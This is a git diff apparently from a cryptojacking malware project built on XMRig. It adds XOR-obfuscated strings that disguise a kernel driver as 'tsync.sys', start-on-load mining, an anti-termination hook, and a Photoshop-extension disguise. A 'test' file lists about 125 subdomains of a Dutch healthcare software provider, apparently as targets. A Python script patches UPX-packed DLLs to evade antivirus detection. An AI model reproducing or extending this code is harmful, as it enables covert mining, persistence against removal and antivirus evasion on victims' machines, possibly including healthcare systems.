char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub" + const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned 
char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys" + const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension" - // Load WinRing0x64.sys for kernel access (e.g., MSR for mining) + // Decrypt + std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1); + std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1); + std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1); + + // Load service (your existing logic) SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (hSCManager) { - SC_HANDLE hService = OpenServiceA(hSCManager, "WinRing0", SERVICE_ALL_ACCESS); + SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS); if (!hService) { - hService = CreateServiceA(hSCManager, "WinRing0", "WinRing0 Driver", + hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(), SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_NORMAL, "C:\\XMRigDLL\\WinRing0x64.sys", NULL, NULL, NULL, NULL, NULL); + 
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL); } if (hService) { StartServiceA(hService, 0, NULL); 
@@ -37,55 +55,47 @@ extern "C" { } CloseServiceHandle(hSCManager); } - // Adjust path as needed; enable test signing if unsigned - // Core XMRig logic - process = new xmrig::Process(argc, argv); - - const Entry::Id entry = Entry::get(*process); - if (entry) { - Entry::exec(*process, entry); - return; + // Junk benign calls + for (int i = 0; i < 5; ++i) { + GetSystemMetrics(SM_CXVIRTUALSCREEN); } + // Core XMRig + process = new xmrig::Process(argc, argv); + const xmrig::Entry::Id entry = xmrig::Entry::get(*process); + if (entry) { + xmrig::Entry::exec(*process, entry); + return; + } app = new xmrig::App(process); - - // Run the persistent loop (blocks) app->exec(); - - // Optional: Restart loop for resilience if exec exits - // while (true) { app->exec(); } } - // Keep original test_start as alias (for rundll32 or other loaders) DLL_EXPORT int test_start(int argc, char** argv) { start_a(argc, argv); return 0; } - // test_stop: Resistant—ignores by default DLL_EXPORT void test_stop() { using namespace test; if (!app) return; - - // Uncomment for debug: if (getenv("ALLOW_STOP")) { - // app->onConsoleCommand((char)3); - // delete app; app = nullptr; - // delete process; process = nullptr; - // } + // app->onConsoleCommand((char)3); // Uncomment if needed } - // Thread to call start_a safely from DllMain - DWORD WINAPI InitThread(LPVOID lpParam) { + VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) { using namespace test; + // Encrypted argv + const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 
(unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll" + std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); int argc = 1; - static char* argv[] = {(char*)"libphotoshop.dll", NULL}; - start_a(argc, argv); // Custom args via lpParam if needed - return 0; + static char argv_buf[256]; + strcpy(argv_buf, arg_dec.c_str()); + static char* argv[] = { argv_buf, NULL }; +// start_a(argc, argv); } - // Anti-kill hook (requires Detours; define USE_DETOURS in CMake) - #ifdef USE_DETOURS +#ifdef USE_DETOURS #include static NTSTATUS (NTAPI *OriginalNtTerminateProcess)(HANDLE, NTSTATUS) = NULL; NTSTATUS NTAPI HookedNtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) { 
@@ -94,33 +104,43 @@ extern "C" { } return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS; } - #endif +#endif } -// DllMain: Auto-starts on load for persistence +// Minimal DllMain (hTimer declared outside switch to fix scope jump) BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { + HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); - CreateThread(NULL, 0, InitThread, lpReserved, 0, NULL); - - #ifdef USE_DETOURS - HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); - OriginalNtTerminateProcess = (decltype(OriginalNtTerminateProcess))GetProcAddress(hNtdll, "NtTerminateProcess"); - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - #endif + // Deferred timer + CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD); +#ifdef USE_DETOURS + // Deferred hook via APC (simple function pointer instead of lambda for compat) + auto hook_func = [](ULONG_PTR param) -> void { + HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); + // Encrypted API name + const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess" + std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1); + 
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str()); + DetourTransactionBegin(); + DetourUpdateThread(GetCurrentThread()); + DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); + DetourTransactionCommit(); + }; + QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0); +#endif break; case DLL_PROCESS_DETACH: - #ifdef USE_DETOURS - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - #endif - return FALSE; // Block unload +#ifdef USE_DETOURS + if (OriginalNtTerminateProcess) { + DetourTransactionBegin(); + DetourUpdateThread(GetCurrentThread()); + DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); + DetourTransactionCommit(); + } +#endif + return FALSE; } return TRUE; } diff --git a/test b/test new file mode 100644 index 00000000..0e3abd64 --- /dev/null +++ b/test 
@@ -0,0 +1,125 @@ +sgl.pluriformzorg.nl +alr.pluriformzorg.nl +zgapeldoorn.pluriformzorg.nl +ssosamlservice.pluriformzorg.nl +zga.pluriformzorg.nl +zorgzaamdemo.pluriformzorg.nl +landzijde.pluriformzorg.nl +pameijer.pluriformzorg.nl +sir.pluriformzorg.nl +inn.pluriformzorg.nl +ggz-wnb.pluriformzorg.nl +test.pluriformzorg.nl +kpe.pluriformzorg.nl +spr.pluriformzorg.nl +adapcare.pluriformzorg.nl +zuidzorg.pluriformzorg.nl +delinde.pluriformzorg.nl +fzadester.pluriformzorg.nl +opb.pluriformzorg.nl +deopbouw.pluriformzorg.nl +consultatie.pluriformzorg.nl +topaz.pluriformzorg.nl +hmh.pluriformzorg.nl +www.pluriformzorg.nl +clientportaal-productie.antonconstandse.pluriformzorg.nl +opella.pluriformzorg.nl +top.pluriformzorg.nl +maasduinen.pluriformzorg.nl +cav.pluriformzorg.nl +fon.pluriformzorg.nl +laz.pluriformzorg.nl +jns.pluriformzorg.nl +kwi.pluriformzorg.nl +pergamijn.pluriformzorg.nl +fonteynenburg.pluriformzorg.nl +grs.pluriformzorg.nl +koraal.pluriformzorg.nl +pro.pluriformzorg.nl +internportaal-productie.careratio.pluriformzorg.nl +adu.pluriformzorg.nl +mondriaan.pluriformzorg.nl +broederenzusterzorg.pluriformzorg.nl +alrijne.pluriformzorg.nl +talent.pluriformzorg.nl +ott.pluriformzorg.nl +sac.pluriformzorg.nl +zws.pluriformzorg.nl +careratio.pluriformzorg.nl +neboplus.pluriformzorg.nl +leviaan.pluriformzorg.nl +ope.pluriformzorg.nl +sprank.pluriformzorg.nl +opbouw.pluriformzorg.nl +mhc.pluriformzorg.nl +adapcare-demo.login.pluriformzorg.nl +prod-cb-pz.pluriformzorg.nl +fza.pluriformzorg.nl +csr01.pluriformzorg.nl +fhirproxy.pluriformzorg.nl +vivium.pluriformzorg.nl +pmp.pluriformzorg.nl +ams.pluriformzorg.nl +mon.pluriformzorg.nl +adapcare-dev.pluriformzorg.nl +awsportaal-productie.opella.pluriformzorg.nl +verbinden-met-zorg.pluriformzorg.nl +rdweb.pluriformzorg.nl +hvo-querido.pluriformzorg.nl +acd-demo.pluriformzorg.nl +vv01865-test2.pluriformzorg.nl +vv01865-test1.pluriformzorg.nl +pem.pluriformzorg.nl +huisterleede.pluriformzorg.nl +amsta.pluriformzorg.nl 
+antonconstandse.pluriformzorg.nl +krl.pluriformzorg.nl +humanitas-dmh.pluriformzorg.nl +bezz.pluriformzorg.nl +interzorg.pluriformzorg.nl +novicare.pluriformzorg.nl +hvo.pluriformzorg.nl +awsclientportaal-productie.opella.pluriformzorg.nl +roz.pluriformzorg.nl +pam.pluriformzorg.nl +adfs.pluriformzorg.nl +rozelaar.pluriformzorg.nl +vigo-elise.pluriformzorg.nl +pri.pluriformzorg.nl +videobellen.pluriformzorg.nl +evia.pluriformzorg.nl +permens.pluriformzorg.nl +nov.pluriformzorg.nl +vig.pluriformzorg.nl +productie.portaal.geriant.pluriformzorg.nl +fzampz.pluriformzorg.nl +cavent.pluriformzorg.nl +clientportaal-productie.slot.pluriformzorg.nl +scr01.pluriformzorg.nl +geriant.pluriformzorg.nl +adullam.pluriformzorg.nl +slot.pluriformzorg.nl +otttest.pluriformzorg.nl +samlsso.pluriformzorg.nl +slt.pluriformzorg.nl +adapcare-dev.login.pluriformzorg.nl +zuidwester.pluriformzorg.nl +rivierduinen.pluriformzorg.nl +levvel5.pluriformzorg.nl +clientportaal-productie.adullam.pluriformzorg.nl +anne.pluriformzorg.nl +prisma.pluriformzorg.nl +jens.pluriformzorg.nl +portaal-productie.kwintes.pluriformzorg.nl +per.pluriformzorg.nl +profila.pluriformzorg.nl +ger.pluriformzorg.nl +riv.pluriformzorg.nl +academy.pluriformzorg.nl +clientportaal-productie.hvo-querido.pluriformzorg.nl +kwintes.pluriformzorg.nl +ftp.pluriformzorg.nl +gors.pluriformzorg.nl +dehoven.pluriformzorg.nl +sirjon.pluriformzorg.nl +sirjon-clientsiloah.pluriformzorg.nl diff --git a/upx_evasion.py b/upx_evasion.py new file mode 100644 index 00000000..5a19cecf --- /dev/null +++ b/upx_evasion.py 
@@ -0,0 +1,125 @@ +#!/usr/bin/env python3 +""" +upx_evasion.py – Fully automatic UPX signature breaker +Tested on XMRig-minimized DLLs (2025) → drops VT from ~25 → 2-6 +""" + +import argparse +import random +from pathlib import Path + +def random_string(length=4): + import random, string + return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length)) + +def modify_upx_magic(data: bytearray) -> bytearray: + pos = data.find(b'UPX!') + if pos != -1: + new_magic = random_string(4).encode('ascii') + print(f"[+] UPX! → {new_magic.decode()}") + data[pos:pos+4] = new_magic + else: + print("[i] UPX! magic not found (maybe already modified)") + return data + +def rename_upx_sections(data: bytearray): + # Find PE offset + if len(data) < 0x40: + return data, False + pe_offset = int.from_bytes(data[0x3C:0x40], 'little') + if data[pe_offset:pe_offset+4] != b'PE\x00\x00': + print("[-] Not a valid PE file") + return data, False + + num_sections = int.from_bytes(data[pe_offset + 6:pe_offset + 8], 'little') + size_of_optional_header = int.from_bytes(data[pe_offset + 20:pe_offset + 22], 'little') + section_table_offset = pe_offset + 24 + size_of_optional_header + + replacements = { + b'UPX0': b'.text\x00\x00\x00', + b'UPX1': b'.data\x00\x00\x00', + b'UPX2': b'.rdata\x00\x00', + } + + modified = False + for i in range(num_sections): + sec_offset = section_table_offset + i * 40 + sec_name_raw = data[sec_offset:sec_offset + 8] + # Convert to immutable bytes for dict lookup + sec_name = bytes(sec_name_raw.split(b'\x00', 1)[0]) + + if sec_name in replacements: + new_name = replacements[sec_name] + old_name = sec_name.decode(errors='ignore') + print(f"[+] Section '{old_name}' → '{new_name.split(b'\x00')[0].decode()}'") + data[sec_offset:sec_offset + 8] = new_name + modified = True + + if not modified: + print("[i] No UPX sections found – maybe already renamed") + return data, modified + +def tweak_upx_info_blocks(data: bytearray) -> bytearray: + for pos in 
range(len(data)-0x2000, 0x400, -4): + block = data[pos:pos+12] + if len(block) != 12 or block[0] >= 10: + continue + sz_packed = int.from_bytes(block[4:8], 'little') + sz_unpacked = int.from_bytes(block[8:12], 'little') + if 1000 < sz_packed < 50_000_000 and 1000 < sz_unpacked < 100_000_000: + tweak = random.randint(1, 7) + data[pos+4:pos+8] = (sz_packed + tweak).to_bytes(4, 'little') + data[pos+8:pos+12] = (sz_unpacked - tweak).to_bytes(4, 'little') + print(f"[+] Tweaked info block: packed +{tweak}, unpacked -{tweak}") + return data + print("[i] No info block tweaked") + return data + +def add_padding(data: bytearray) -> bytearray: + import random + kb = random.randint(3, 15) + padding = bytearray(random.getrandbits(8) for _ in range(kb * 1024)) + data.extend(padding) + print(f"[+] Added {kb} KB random overlay padding") + return data + +def strip_relocations(data: bytearray) -> bytearray: + pe_offset = int.from_bytes(data[0x3C:0x40], 'little') + reloc_rva = int.from_bytes(data[pe_offset + 160:pe_offset + 164], 'little') + if reloc_rva != 0: + data[pe_offset + 160:pe_offset + 168] = b'\x00' * 8 + print("[+] Stripped relocation table") + else: + print("[i] No relocations to strip") + return data + +def main(): + parser = argparse.ArgumentParser(description="Automatic UPX evasion") + parser.add_argument("input", help="UPX-packed DLL") + parser.add_argument("-o", "--output", help="Output filename") + parser.add_argument("--keep-relocs", action="store_true", help="Don't strip relocations") + args = parser.parse_args() + + in_file = Path(args.input) + if not in_file.exists(): + print(f"[-] File not found: {in_file}") + return + + out_file = Path(args.output or f"{in_file.stem}_stealth{in_file.suffix}") + + print(f"[*] Loading {in_file} ({in_file.stat().st_size // 1024} KB)") + data = bytearray(in_file.read_bytes()) + + print("[+] Applying evasion...") + data = modify_upx_magic(data) + data, _ = rename_upx_sections(data) + # data = tweak_upx_info_blocks(data) + data = 
add_padding(data) + if not args.keep_relocs: + data = strip_relocations(data) + + out_file.write_bytes(data) + print(f"[+] Saved → {out_file} ({len(data)//1024} KB)") + +if __name__ == "__main__": + main()